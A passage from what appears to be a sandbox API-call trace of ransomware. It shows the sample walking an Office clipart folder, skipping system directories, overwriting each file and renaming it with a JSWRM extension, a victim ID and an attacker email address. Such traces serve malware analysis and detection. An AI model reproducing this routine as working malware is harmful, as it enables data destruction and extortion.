(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00132_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00132_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00132_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0098.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00132_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00132_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.369] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2076) returned 1 [0098.369] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x810) returned 0x20c6c0 [0098.369] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x810, lpOverlapped=0x0) returned 1 [0098.371] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.371] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x810, lpOverlapped=0x0) returned 1 [0098.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.371] CloseHandle (hObject=0x314) returned 1 [0098.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0098.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0098.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0098.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0098.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0098.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.372] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00132_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00132_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00132_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00132_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0098.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.372] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1412, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00170_.WMF", cAlternateFileName="")) returned 1 [0098.372] lstrcmpiW (lpString1="SY00170_.WMF", lpString2=".") returned 1 [0098.372] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="..") returned 1 [0098.372] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="...") returned 1 [0098.372] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="windows") returned -1 [0098.373] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="recovery") returned 1 [0098.373] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="perflogs") returned 1 [0098.373] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="documents and settings") returned 1 [0098.373] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.373] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="system volume information") returned -1 [0098.373] lstrcmpiW (lpString1="SY00170_.WMF", lpString2="msocache") returned 1 [0098.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0098.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00170_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00170_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00170_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0098.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00170_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00170_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00170_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0098.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.373] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5138) returned 1 [0098.374] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1410) returned 0x205850 [0098.374] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1410, lpOverlapped=0x0) returned 1 [0098.375] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.375] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1410, lpOverlapped=0x0) returned 1 [0098.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.376] CloseHandle (hObject=0x314) returned 1 [0098.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0098.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0098.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0098.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0098.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0098.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0098.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.376] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00170_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00170_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00170_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0098.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0098.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0098.378] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00560_.WMF", cAlternateFileName="")) returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2=".") returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="..") returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="...") returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="windows") returned -1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="recovery") returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="perflogs") returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="documents and settings") returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.378] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="system volume information") returned -1 [0098.379] lstrcmpiW (lpString1="SY00560_.WMF", lpString2="msocache") returned 1 [0098.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0098.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00560_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00560_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00560_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0098.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00560_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00560_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00560_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00560_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00560_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.379] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1292) returned 1 [0098.379] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x500) returned 0x230a00 [0098.379] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x500, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x500, lpOverlapped=0x0) returned 1 [0098.382] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.382] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x500, lpOverlapped=0x0) returned 1 [0098.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0098.382] CloseHandle (hObject=0x314) returned 1 [0098.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0098.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0098.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0098.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0098.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0098.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00560_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00560_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00560_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00560_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0098.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.383] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x778, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00642_.WMF", cAlternateFileName="")) returned 1 [0098.383] lstrcmpiW (lpString1="SY00642_.WMF", lpString2=".") returned 1 [0098.383] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="..") returned 1 [0098.383] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="...") returned 1 [0098.383] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="windows") returned -1 [0098.384] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="recovery") returned 1 [0098.384] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="perflogs") returned 1 [0098.384] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="documents and settings") returned 1 [0098.384] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.384] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="system volume information") returned -1 [0098.384] lstrcmpiW (lpString1="SY00642_.WMF", lpString2="msocache") returned 1 [0098.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0098.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00642_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00642_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00642_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0098.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0098.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00642_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00642_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00642_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0098.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0098.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0098.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00642_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00642_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.385] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1912) returned 1 [0098.385] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, 